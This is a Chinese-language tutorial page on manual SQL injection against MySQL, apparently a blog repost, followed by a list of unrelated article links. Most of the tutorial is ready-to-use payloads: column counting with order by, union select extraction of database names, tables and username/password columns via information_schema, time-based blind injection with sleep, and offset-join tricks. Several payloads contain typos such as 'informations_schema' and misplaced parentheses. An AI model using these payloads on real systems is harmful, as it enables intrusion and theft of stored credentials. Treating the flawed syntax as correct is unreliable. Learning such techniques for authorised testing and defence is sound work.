当前位置：首页 > news >正文

sql注入详解

news 2026/2/8 21:11:14

ps:简单说下这里只写了我能理解的明白的，后面的二阶注入，堆叠注入没写

手工sql注入
1.存在sql注入本质上就是数据库过滤的不严格或者未进行过滤，1 and 1=1，返回正常，1 and 1=2 返回不正常，说明带到数据库里面去查询给语句了，这时候就可以判断存在sql注入了，再来判断注入类型，如果1 and 1=1 / 1 and 1=2 返回都正常说明直接给你过滤了或者说没带到数据库里面去查询，说明不存在sql注入。
当然这里说的示一阶注入，大多数网站都是来判断一阶注入，也有二阶注入。
当然现在不用老方法来判断了，现在可以用数字型(整形):id=1/1 1/0 id=2-1 id=2-2
字符型：id=1' id=1''

2.判断数据库有多少列，这里可以用order by语句例：id=1 order by 3 (正常)
id=1 order by 4 (正常)
id=1 order by 5 (报错)
说明他的数据库就4列，5就报错了，4就是他的临界值也就是最大值
3.知道了他的数据库有多少列之后现在来判断注入点可以用 union select语句例：id=-1 union select 1,2,3,4 --+ (这里简单说下1前面的符号是为了直接执行union select 后面的语句，--+是为了过滤也就是注释掉 limit 0,1这个语句，可以用#也是注释的意思)。
4.知道了那一列有注入点之后来爆数据库的相关信息，比如数据库名啊，数据库版本号啊，数据库用户啊，表名，列明，字段名字，以及操作系统。
例：id=-1 union select 1,version(),database(),4这就能够知道他的数据库版本信息，以及数据库名，在用注入点来爆数据库的表名，列名，字段名，操作系统版本等。
5.当然这里注意一下如果是mysql5.0以上版本的加了一个information_schema这是高版本自带的数据库，以及information_schema.tables自带系统表，informations_schema.columns自带系统字段，表名table_name，字段名column_name，table_name,库名table_schema
6.那么mysql高版本查询表名例：id=-1 union select 1,2,group_concat(table_name),4 from informations_schema.tables where table_schema=database() #(database=数据库名)
7.查询列名:id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database() and table_name='123'
8.查询列名中的数据例：id=-1 union select group_concat(username),group_concat('~'password) from 123
9.那么5.0以下查询数据例:id=-1 union select 1,2,字段名,4 from 表名

10.延时注入例:id=1 and sleep(5) --+ #就是延迟五秒
实例:username=1 and sleep(2) --+&password=123
来爆数据库长度:username=1 and sleep(if((length(database())=10),1,2)) --+&password=123
sleep(2)延迟两秒，if(判断条件是否成立成立就返回1，不成立返回2) ，length(判断数据库长度是否为10)
11.爆表名的第一位是否是q:
username=1 and sleep (if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1)1,1)='c'),1,2)) --+&password=123(就是把爆database是什么的语句换成那个了查询表名的语句)。
12.接下来爆字段名：
username=1 and sleep(if(mid((select column_name from information_schema.columns where table_name='qwert' and table_schema=database() limit 0,1),1,1)='y',1,2)) --+&password=123
13.爆数据名第一位：
username=1 and sleep(if(mid(()select username from cab limit+0,1),1,1)='o',1,2)) --+&password=123

14.报错注入他的原理就是一些特殊的函数错误的使用并输出错误的结果所导致的
最常见的报错注入函数有floor etractvalue updataxml
floor报错主要是因为group by 插入数据时由于rand多次计算导致主键重复，从而报错，又因为报错前concat()中sql语句被执行导致语句报错被抛出主键是sql语句或执行后的结果。

偏移注入：两列id=1 union select 1,2,3,4,5,6,7,8,9,* from(admin as a inner join admin as b on a.id=b.id)

三列：d=1 union select 1，2，3，4，5，6，7，8，9,* from((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id

sql注入详解

相关文章：

sql注入详解

[蓝桥杯 2022 省 B] 李白打酒加强版

【检索增强】Retrieval-Augmented Generation for Large Language Models：A Survey

EVM Layer2 主流解决方案

go中结构体标签：omitempty、json꞉“name“、 gorm꞉“column꞉name“、yaml꞉“name“

七月论文审稿GPT第4版：通过paper-review数据集微调Mixtral-8x7b，对GPT4胜率超过80%

【QT学习】1.qt初识，创建qt工程，使用按钮，第一个交互按钮

JavaScript_与html结合方式

WPF —— 动画

前端二维码生成工具小程序：构建营销神器的技术解析

光伏发电量预测（Python代码，CNN结合LSTM，TensorFlow框架）

GPT带我学-设计模式11-组合模式

Centos7 elasticsearch-7.7.0 集群搭建，启用x-pack验证 Kibana7.4用户管理

[CSS]中子元素在父元素中居中

电脑突然死机怎么办?

Kyligence 正式加入华为“同舟共济”行动计划，成为行业数智化“联盟级伙伴”

大模型推理框架——text-generation-inference

电梯四种事故检测YOLOV8

构建docker环境下的thunder迅雷插件

Django开发复盘

基于距离变化能量开销动态调整的WSN低功耗拓扑控制开销算法matlab仿真

通过Wrangler CLI在worker中创建数据库和表

为什么需要建设工程项目管理？工程项目管理有哪些亮点功能？

oracle与MySQL数据库之间数据同步的技术要点

React19源码系列之事件插件系统

拉力测试cuda pytorch 把 4070显卡拉满

项目部署到Linux上时遇到的错误（Redis，MySQL，无法正确连接，地址占用问题）

rnn判断string中第一次出现a的下标

return this；返回的是谁

Go语言多线程问题